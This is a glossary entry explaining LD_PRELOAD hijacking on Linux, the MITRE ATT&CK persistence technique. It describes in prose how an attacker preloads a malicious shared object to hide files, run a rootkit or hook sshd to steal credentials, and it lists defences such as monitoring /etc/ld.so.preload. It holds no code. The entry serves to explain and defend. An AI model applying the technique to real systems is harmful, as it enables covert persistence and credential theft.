LD_PRELOAD Hijacking
What is LD_PRELOAD Hijacking?
LD_PRELOAD HijackingLinux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
LD_PRELOAD hijacking (MITRE ATT&CK T1574.006) abuses the GNU dynamic linker on Linux and most Unix-like systems. By setting LD_PRELOAD (for a single process or a user shell) or by writing a path to /etc/ld.so.preload (system-wide), an attacker forces ld.so to load a chosen shared object before all other libraries. The malicious .so can hook libc symbols such as readdir, open, accept, or write to hide files and processes, capture credentials, or maintain a userland rootkit. The technique works against non-setuid binaries and is widely used by Linux malware families like HiddenWasp and Symbiote. Defenses: monitor /etc/ld.so.preload for changes (AIDE, auditd), restrict it to root, watch for unexpected LD_PRELOAD usage, and verify libc behavior with statically linked tools.
● Examples
- 01
Writing /usr/lib/libsel.so into /etc/ld.so.preload so every new process loads a userland rootkit.
- 02
Setting LD_PRELOAD for sshd to hook PAM authentication and steal credentials.
● Frequently asked questions
What is LD_PRELOAD Hijacking?
Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes. It belongs to the Attacks & Threats category of cybersecurity.
What does LD_PRELOAD Hijacking mean?
Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
How does LD_PRELOAD Hijacking work?
LD_PRELOAD hijacking (MITRE ATT&CK T1574.006) abuses the GNU dynamic linker on Linux and most Unix-like systems. By setting LD_PRELOAD (for a single process or a user shell) or by writing a path to /etc/ld.so.preload (system-wide), an attacker forces ld.so to load a chosen shared object before all other libraries. The malicious .so can hook libc symbols such as readdir, open, accept, or write to hide files and processes, capture credentials, or maintain a userland rootkit. The technique works against non-setuid binaries and is widely used by Linux malware families like HiddenWasp and Symbiote. Defenses: monitor /etc/ld.so.preload for changes (AIDE, auditd), restrict it to root, watch for unexpected LD_PRELOAD usage, and verify libc behavior with statically linked tools.
How do you defend against LD_PRELOAD Hijacking?
Defences for LD_PRELOAD Hijacking typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for LD_PRELOAD Hijacking?
Common alternative names include: ld.so.preload abuse, Shared library hijack.
● Related terms
- attacks№ 331
DLL Hijacking
An attack that abuses Windows DLL search order to make a legitimate program load an attacker-controlled library instead of the intended one.
- attacks№ 238
Cron Persistence
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event.
- attacks№ 608
launchd Persistence
macOS persistence technique that installs a LaunchDaemon or LaunchAgent property list so launchd executes attacker code at boot, login, or on a trigger.
- malware№ 949
Rootkit
Stealth malware that grants and hides privileged access to an operating system or device, evading detection by standard tools.
- attacks№ 862
Process Injection
A family of evasion techniques in which an attacker runs malicious code inside the address space of a legitimate process to inherit its trust and identity.
● See also
- № 054AppInit_DLLs